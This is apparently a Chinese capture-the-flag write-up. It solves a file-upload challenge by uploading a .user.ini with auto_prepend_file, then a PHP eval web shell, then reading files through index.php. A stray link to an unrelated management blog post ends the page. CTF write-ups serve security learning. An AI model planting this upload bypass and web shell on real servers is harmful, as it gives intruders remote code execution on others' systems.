0x00 前言
- CTF 加解密合集
- CTF Web合集
0x01 题目
0x02 Write Up
首先看到是一个上传页面,测试其他无果,遂进行目录遍历,发现upload.php.bak文件
可以看到这里的限制条件,大小,以及内容,这里可以使用.user.ini进行上传,具体参考:php user.ini详解
那么我们先上传.user.ini
auto_prepend_file=1.txt
然后上传1.txt,尝试使用get,但是没有生效,这里需要控制字符数量
<?php eval($_POST['a']);
上传好了之后,通过index.php进行访问
首先查看当前目录
然后通过highlight_file读取文件
以上
![[机缘参悟-102] :IT人 - 管理的本质?管理人与从事技术的本质区别?人性、冰山模型、需求层次模型](https://img-blog.csdnimg.cn/img_convert/55062531d0dd55093c68b5d2873400ee.jpeg)
